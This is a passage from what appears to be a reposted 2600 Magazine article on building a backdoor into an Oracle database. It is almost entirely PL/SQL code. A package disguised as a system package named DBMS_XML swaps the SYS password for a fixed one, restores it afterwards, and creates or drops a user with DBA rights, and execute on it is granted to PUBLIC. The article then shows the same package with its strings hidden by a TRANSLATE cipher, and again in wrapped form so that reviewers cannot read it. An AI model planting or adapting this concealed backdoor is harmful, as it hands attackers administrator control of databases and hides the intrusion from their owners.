Continued from 2600 Magazine - A Back Door To Your Oracle Database
Part 2: Obfuscation of the String Literals then Wrapping the Code
Below is a listing of the code of DBMS_XML as it appears in the 2600 Magazine article:
CREATE OR REPLACE PACKAGE dbms_xml AS PROCEDURE parse (string IN VARCHAR2); END dbms_xml; / CREATE OR REPLACE PACKAGE BODY dbms_xml AS PROCEDURE parse (string IN VARCHAR2) IS var1 VARCHAR2 (100); BEGIN IF string = 'unlock' THEN SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS'; EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))'; EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')'; COMMIT; EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY hack11hack'; END IF; IF string = 'lock' THEN EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1; EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||''''; EXECUTE IMMEDIATE 'DROP TABLE syspa1'; END IF; IF string = 'make' THEN EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY hack11hack'; EXECUTE IMMEDIATE 'GRANT DBA TO hill'; END IF; IF string = 'unmake' THEN EXECUTE IMMEDIATE 'DROP USER hill CASCADE'; END IF; END; END dbms_xml; / CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml; GRANT EXECUTE ON dbms_xml TO PUBLIC;The code below demonstrates how to obfuscate the text strings using the translate function:
CREATE OR REPLACE PACKAGE dbms_xml AS PROCEDURE parse (STRING IN VARCHAR2); END dbms_xml; / CREATE OR REPLACE PACKAGE BODY dbms_xml AS PROCEDURE parse (STRING IN VARCHAR2) IS var1 VARCHAR2 (100); /* ------- sub function begin ------- */ FUNCTION conv (input IN VARCHAR2) RETURN VARCHAR2 IS x VARCHAR2 (300); BEGIN x := TRANSLATE (input, 'ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 ', ' 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' ); RETURN x; EXCEPTION WHEN OTHERS THEN RETURN NULL; END conv; /* ------- sub function end ------- */ BEGIN IF STRING = 'unlock' THEN EXECUTE IMMEDIATE conv ('7kdkm6Z0o773a8lZj8acZLMO_uwKxwZ3hk8kZuwKxBOCKZ=Z''717''') INTO var1; EXECUTE IMMEDIATE conv ('NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP))'); EXECUTE IMMEDIATE conv ('GBwKxvZGBvAZwqwzOYZtODuKwZ(''') || var1 || ''')'; COMMIT; var1:= conv ('od6k8Z57k8Z717Zglkb6gjgklZn1ZHONEYYHONE'); EXECUTE IMMEDIATE var1; END IF; IF STRING = 'lock' THEN EXECUTE IMMEDIATE conv ('7kdkm6ZNADYZj8acZwqwzOYZ3hk8kZ8a3b5c=Y') INTO var1; EXECUTE IMMEDIATE conv ('od6k8Z57k8Z717Zglkb6gjgklZn1Z4od5k7Z''') || var1 || ''''; EXECUTE IMMEDIATE conv ('l8a0Z6ondkZwqwzOY'); END IF; IF STRING = 'make' THEN EXECUTE IMMEDIATE conv ('m8ko6kZ57k8ZHGDDZglkb6gjgklZn1ZHONEYYHONE'); EXECUTE IMMEDIATE conv ('i8ob6ZlnoZ6aZHGDD'); END IF; IF STRING = 'unmake' THEN EXECUTE IMMEDIATE conv ('l8a0Z57k8ZHGDDZmo7molk'); END IF; END; END dbms_xml; / create public synonym dbms_sql for dbms_xml; grant execute on dbms_xml to public;The code below has has been modified by the WRAP utility. Now, it is very difficult to understand it, and impossible to edit it.
CREATE OR REPLACE PACKAGE dbms_xml wrapped 0 abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd 3 9 9000000 1 4 0 5 2 :e: 1PACKAGE: 1DBMS_XML: 1PARSE: 1STRING: 1VARCHAR2: 0 0 0 13 2 0 a0 97 9a 8f a0 b0 3d b4 55 6a a0 :2 aa 59 58 1d 17 b5 13 2 0 3 7 11 2d 29 28 35 25 3a 3e 42 46 48 4a 4d 50 51 5a 13 2 0 1 9 e 15 1f :2 15 14 :2 4 5 :7 1 13 4 0 :2 1 :8 3 4 :7 1 5c 4 :3 0 1 :3 0 2 :6 0 1 :2 0 3 :a 0 a 2 :7 0 5 :2 0 3 5 :3 0 4 :7 0 6 5 :3 0 8 :2 0 a 3 9 0 c 2 :3 0 7 e 0 e c d f 2 e 11 0 10 f 12 :8 0 9 4 :3 0 1 4 1 7 1 a 1 4 0 11 0 1 14 2 3 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 1 3 1 2 4 2 0 0 / CREATE OR REPLACE PACKAGE BODY dbms_xml wrapped 0 abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd 3 b 9000000 1 4 0 27 2 :e: 1PACKAGE: 1BODY: 1DBMS_XML: 1PARSE: 1STRING: 1VARCHAR2: 1VAR1: 1100: 1FUNCTION: 1CONV: 1INPUT: 1RETURN: 1X: 1300: 1TRANSLATE: 1ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 : 1 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ: 1OTHERS: 1=: 1unlock: 1EXECUTE: 1IMMEDIATE: 17kdkm6Z0o773a8lZj8acZLMO_uwKxwZ3hk8kZuwKxBOCKZ=Z'717': 1NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP)): 1GBwKxvZGBvAZwqwzOYZtODuKwZ(': 1||: 1'): 1COMMIT: 1od6k8Z57k8Z717Zglkb6gjgklZn1ZHONEYYHONE: 1lock: 17kdkm6ZNADYZj8acZwqwzOYZ3hk8kZ8a3b5c=Y: 1od6k8Z57k8Z717Zglkb6gjgklZn1Z4od5k7Z': 1': 1l8a0Z6ondkZwqwzOY: 1make: 1m8ko6kZ57k8ZHGDDZglkb6gjgklZn1ZHONEYYHONE: 1i8ob6ZlnoZ6aZHGDD: 1unmake: 1l8a0Z57k8ZHGDDZmo7molk: 0 0 0 da 2 0 :2 a0 97 9a 8f a0 b0 3d b4 55 6a a3 a0 51 a5 1c 81 b0 a0 8d 8f a0 b0 3d b4 :2 a0 2c 6a a3 a0 51 a5 1c 81 b0 :3 a0 :2 6e a5 b d :2 a0 65 b7 a0 53 a0 4d 65 b7 a6 9 a4 a0 b1 11 68 4f a0 7e 6e b4 2e :3 a0 6e a5 b a0 11e 11d :3 a0 6e a5 b 11e 11d :3 a0 6e a5 b 7e a0 b4 2e 7e 6e b4 2e 11e 11d a0 57 a0 b4 e9 :2 a0 6e a5 b d :3 a0 11e 11d b7 19 3c a0 7e 6e b4 2e :3 a0 6e a5 b a0 11e 11d :3 a0 6e a5 b 7e a0 b4 2e 7e 6e b4 2e 11e 11d :3 a0 6e a5 b 11e 11d b7 19 3c a0 7e 6e b4 2e :3 a0 6e a5 b 11e 11d :3 a0 6e a5 b 11e 11d b7 19 3c a0 7e 6e b4 2e :3 a0 6e a5 b 11e 11d b7 19 3c b7 a4 b1 11 68 4f b1 b7 a4 11 a0 b1 56 4f 1d 17 b5 da 2 0 3 7 b 15 31 2d 2c 39 29 3e 42 5f 4a 4e 51 52 5a 49 66 6a 86 82 46 8e 81 93 97 9b 9f b9 a7 7e ab ac b4 a6 c0 c4 c8 cc d1 a3 d6 d8 dc e0 e4 e8 ea 1 ee f2 f3 f7 f9 fa ff 103 107 109 115 119 11b 11f 122 127 128 12d 131 135 139 13e 13f 141 145 14a 14e 152 156 15a 15f 160 162 167 16b 16f 173 177 17c 17d 17f 182 186 187 18c 18f 194 195 19a 19f 1a3 1a7 1ac 1b0 1b1 1b6 1ba 1be 1c3 1c4 1c6 1ca 1ce 1d2 1d6 1db 1df 1e1 1e5 1e8 1ec 1ef 1f4 1f5 1fa 1fe 202 206 20b 20c 20e 212 217 21b 21f 223 227 22c 22d 22f 232 236 237 23c 23f 244 245 24a 24f 253 257 25b 25f 264 265 267 26c 270 272 276 279 27d 280 285 286 28b 28f 293 297 29c 29d 29f 2a4 2a8 2ac 2b0 2b4 2b9 2ba 2bc 2c1 2c5 2c7 2cb 2ce 2d2 2d5 2da 2db 2e0 2e4 2e8 2ec 2f1 2f2 2f4 2f9 2fd 2ff 303 306 308 30c 30e 31a 31e 320 322 324 328 334 338 33a 33d 33f 340 349 da 2 0 1 9 :2 e 15 1f :2 15 14 :2 4 7 e 18 17 :2 e :2 7 10 16 1f :2 16 15 a 11 :2 7 a e 18 17 :2 e :2 a d :3 18 :2 d :2 a 11 a 7 :2 f d 14 d :3 a 7 b :4 7 a 11 13 :2 11 a 12 1c 22 :2 1c 62 :3 a 12 1c 22 :2 1c :3 a 12 1c 22 :2 1c 43 46 :2 1c 4b 4e :2 1c :7 a 4 b 11 :2 b 4 a 12 1c :2 a :3 7 a 11 13 :2 11 a 12 1c 22 :2 1c 51 :3 a 12 1c 22 :2 1c 4c 4f :2 1c 54 57 :2 1c :3 a 12 1c 22 :2 1c :2 a :3 7 a 11 13 :2 11 a 12 1c 22 :2 1c :3 a 12 1c 22 :2 1c :2 a :3 7 a 11 13 :2 11 a 12 1c 22 :2 1c :2 a :3 7 :a 4 5 :6 1 da 4 0 :3 1 :8 3 :7 5 :7 7 :2 8 :2 7 :7 a c :2 d e f :2 d c :3 11 b :2 13 :3 15 14 :2 13 12 16 :4 7 :5 19 :9 1b :8 1c :10 1d :5 1e :6 1f :5 20 1a :2 19 :5 23 :9 25 :10 26 :8 27 24 :2 23 :5 2a :8 2c :8 2d 2b :2 2a :5 30 :8 32 31 :2 30 :2 18 :8 3 35 :6 1 34b 4 :3 0 1 :3 0 2 :3 0 3 :6 0 1 :2 0 4 :a 0 cd 2 :7 0 5 :2 0 3 6 :3 0 5 :7 0 7 6 :3 0 9 :2 0 cd 4 a :2 0 b 7e 0 9 6 :3 0 8 :2 0 7 d f :6 0 12 10 0 cb 0 7 :6 0 9 :3 0 a :a 0 3d 3 :7 0 e :2 0 d 6 :3 0 b :7 0 17 16 :3 0 c :3 0 6 :3 0 19 1b 0 3d 14 1c :2 0 13 :2 0 11 6 :3 0 f 1f 21 :6 0 24 22 0 3b 0 d :6 0 d :3 0 f :3 0 b :3 0 10 :4 0 11 :4 0 26 2a 25 2b 0 30 c :3 0 d :3 0 2e :2 0 30 17 3c 12 :3 0 c :4 0 34 :2 0 36 1a 38 1c 37 36 :2 0 39 1e :2 0 3c a :3 0 20 3c 3b 30 39 :6 0 3d 2 0 14 1c 3c cb :2 0 5 :3 0 13 :2 0 14 :4 0 24 40 42 :3 0 15 :3 0 16 :3 0 a :3 0 17 :4 0 27 46 48 7 :3 0 49 4a :3 0 4b :2 0 75 15 :3 0 16 :3 0 a :3 0 18 :4 0 29 4f 51 52 :4 0 53 :2 0 75 15 :3 0 16 :3 0 a :3 0 19 :4 0 2b 57 59 1a :2 0 7 :3 0 2d 5b 5d :3 0 1a :2 0 1b :4 0 30 5f 61 :3 0 62 :4 0 63 :2 0 75 1c :3 0 67 68 :2 0 69 1c :5 0 66 :2 0 75 7 :3 0 a :3 0 1d :4 0 33 6b 6d 6a 6e 0 75 15 :3 0 16 :3 0 7 :3 0 72 :4 0 73 :2 0 75 35 76 43 75 0 77 3c 0 c9 5 :3 0 13 :2 0 1e :4 0 40 79 7b :3 0 15 :3 0 16 :3 0 a :3 0 1f :4 0 43 7f 81 7 :3 0 82 83 :3 0 84 :2 0 9e 15 :3 0 16 :3 0 a :3 0 20 :4 0 45 88 8a 1a :2 0 7 :3 0 47 8c 8e :3 0 1a :2 0 21 :4 0 4a 90 92 :3 0 93 :4 0 94 :2 0 9e 15 :3 0 16 :3 0 a :3 0 22 :4 0 4d 98 9a 9b :4 0 9c :2 0 9e 4f 9f 7c 9e 0 a0 53 0 c9 5 :3 0 13 :2 0 23 :4 0 57 a2 a4 :3 0 15 :3 0 16 :3 0 a :3 0 24 :4 0 5a a8 aa ab :4 0 ac :2 0 b6 15 :3 0 16 :3 0 a :3 0 25 :4 0 5c b0 b2 b3 :4 0 b4 :2 0 b6 5e b7 a5 b6 0 b8 61 0 c9 5 :3 0 13 :2 0 26 :4 0 65 ba bc :3 0 15 :3 0 16 :3 0 a :3 0 27 :4 0 68 c0 c2 c3 :4 0 c4 :2 0 c6 6a c7 bd c6 0 c8 6c 0 c9 6e cc :3 0 cc 73 cc cb c9 ca :6 0 cd 1 0 4 a cc d4 :3 0 d2 0 d2 :3 0 d2 d4 d0 d1 :6 0 d5 :2 0 3 :3 0 76 0 3 d2 d8 :3 0 d7 d5 d9 :8 0 78 4 :3 0 1 5 1 8 1 e 1 c 1 15 1 18 1 20 1 1e 3 27 28 29 2 2c 2f 1 35 1 32 1 38 1 23 1 41 2 3f 41 1 47 1 50 1 58 2 5a 5c 2 5e 60 1 6c 6 4c 54 64 69 6f 74 1 76 1 7a 2 78 7a 1 80 1 89 2 8b 8d 2 8f 91 1 99 3 85 95 9d 1 9f 1 a3 2 a1 a3 1 a9 1 b1 2 ad b5 1 b7 1 bb 2 b9 bb 1 c1 1 c5 1 c7 4 77 a0 b8 c8 2 11 3d 1 cd 1 4 0 d8 0 1 14 3 7 0 1 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 c 2 0 3 0 1 4 1 2 15 3 0 5 2 0 1e 3 0 14 2 3 0 / create public synonym dbms_xml for dbms_xml; grant execute on dbms_xml to public;